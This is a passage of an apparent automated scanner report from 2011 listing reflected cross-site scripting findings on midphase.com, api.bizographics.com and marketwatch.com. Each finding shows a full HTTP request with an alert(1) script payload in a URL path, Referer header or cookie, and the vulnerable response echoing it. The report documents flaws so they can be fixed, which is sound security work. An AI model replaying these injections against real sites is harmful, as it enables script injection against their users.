Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; refresh=off; rsi_csl=; rsi_segs=; BIZO=biz=1053&; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Home%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp05
Date: Sat, 14 May 2011 10:33:16 GMT
Content-Length: 51081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/storybd171';895992777ed/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.103. http://www.midphase.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dbc2"><script>alert(1)</script>632c554a508 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6dbc2"><script>alert(1)</script>632c554a508 HTTP/1.1
Host: www.midphase.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1305377515.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1634246940.1305377515.1305377515.1305377515.1; __utmc=1; __utmv=1.|1=Chat=Yes=1,; __utmb=1.2.10.1305377515; rrCookie_sessionInfo=%7B%22status%22%3A%22invalid%22%7D

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 12:53:33 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Set-Cookie: PHPSESSID=859980f553abc79bfc641c0f70463d4a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/favicon.ico6dbc2"><script>alert(1)</script>632c554a508" />
...[SNIP]...

4.104. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81167"><script>alert(1)</script>99199d6d8d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes81167"><script>alert(1)</script>99199d6d8d4/form-processing/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:18 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes81167"><script>alert(1)</script>99199d6d8d4/form-processing/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.105. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c41"><script>alert(1)</script>4d2893d813a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing78c41"><script>alert(1)</script>4d2893d813a/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:21 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing78c41"><script>alert(1)</script>4d2893d813a/captcha/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.106. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae79b"><script>alert(1)</script>9d0b499024c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captchaae79b"><script>alert(1)</script>9d0b499024c/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:23 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captchaae79b"><script>alert(1)</script>9d0b499024c/cryptographp.inc.php?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.107. http://www.midphase.com/includes/form-processing/captcha/cryptographp.inc.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.inc.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e16be"><script>alert(1)</script>1b06e342ecb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha/cryptographp.inc.phpe16be"><script>alert(1)</script>1b06e342ecb?cfg=gray.cfg.php&sn=PHPSESSID& HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: cryptcookietest=1; PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4; __utma=1.1523231672.1305459815.1305459815.1305459815.1; __utmb=1.1.10.1305459815; __utmc=1; __utmz=1.1305459815.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha/cryptographp.inc.phpe16be"><script>alert(1)</script>1b06e342ecb?cfg=gray.cfg.php&sn=PHPSESSID&" />
...[SNIP]...

4.108. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4abb0"><script>alert(1)</script>2e2a3247d6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes4abb0"><script>alert(1)</script>2e2a3247d6d/form-processing/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes4abb0"><script>alert(1)</script>2e2a3247d6d/form-processing/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.109. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5edea"><script>alert(1)</script>b0b3170b056 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing5edea"><script>alert(1)</script>b0b3170b056/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing5edea"><script>alert(1)</script>b0b3170b056/captcha/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.110. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 527ba"><script>alert(1)</script>327fd3bc82b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha527ba"><script>alert(1)</script>327fd3bc82b/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha527ba"><script>alert(1)</script>327fd3bc82b/cryptographp.php?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.111. http://www.midphase.com/includes/form-processing/captcha/cryptographp.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.midphase.com
Path:   /includes/form-processing/captcha/cryptographp.php

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7"><script>alert(1)</script>06a292b4cf1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/form-processing/captcha/cryptographp.php9abb7"><script>alert(1)</script>06a292b4cf1?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4 HTTP/1.1
Host: www.midphase.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.midphase.com/favicon.ico6dbc2%22%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E632c554a508
Cookie: PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 11:44:27 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 16436


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-
...[SNIP]...
<input type="hidden" name="url" value="/includes/form-processing/captcha/cryptographp.php9abb7"><script>alert(1)</script>06a292b4cf1?cfg=gray.cfg.php&PHPSESSID=4ce2fc16286b938aab03c2f4eaa18ef4" />
...[SNIP]...

4.112. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 40c1e<script>alert(1)</script>2e9333aef9f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 40c1e<script>alert(1)</script>2e9333aef9f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Sat, 14 May 2011 10:09:45 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 40c1e<script>alert(1)</script>2e9333aef9f

4.113. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c93e5'-alert(1)-'ec0cd355753 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_vnum=1307959980006%26vn%3D1; refresh=off; BIZO=biz=1053&c93e5'-alert(1)-'ec0cd355753; ASP.NET_SessionId=oz1fwf5bs4it123trqmlzxnf; __g_c=w%3A1%7Cb%3A3%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_cc=true; rsi_csl=lA; rsi_segs=G07608_10001; _chartbeat2=g73giwkwwxj3e1nb; s_invisit=true; s_sq=djglobal%2Cdjmarketwatch%3D%2526pid%253DMW_Article_Futures%252520Movers_53B5F46A-7D06-11E0-915A-00212804637C%2526pidt%253D1%2526oid%253Dhttp%25253A//www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13%25253Flink%25253DMW_story_in%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: secdfpswebp04
Date: Sat, 14 May 2011 10:34:08 GMT
Content-Length: 141589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
   ScrillaZilla.Client('#ad_PremiumContentBottom',
               {
                   ord : 1944859510,
                   src : 'http://ad.doubleclick.net/adi/marketwatch.com/mutualfunds_jaffe;mc=MWRetWeek;s=8_10001;u=%5e%5elA;biz=1053;c93e5'-alert(1)-'ec0cd355753;sz=571x100;tile=1;ord=',
                   width : '571',
                   height : '100',
                   
                   lateLoad : true,
                   refresh : false,
                   independentRefresh : false,
                   refreshRate : 480000,
                   refreshDoma
...[SNIP]...

4.114. http://www.marketwatch.com/story/citigroups-new-look-is-plainly-cosmetic-2011-05-13 [BIZO cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13

Issue detail

The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56b02"><script>alert(1)</script>4af42568a0c was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /story/citigroups-new-look-is-plainly-cosmetic-2011-05-13?link=MW_story_investinginsightb HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/story/oil-futures-ease-but-stay-above-98-a-barrel-2011-05-12
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
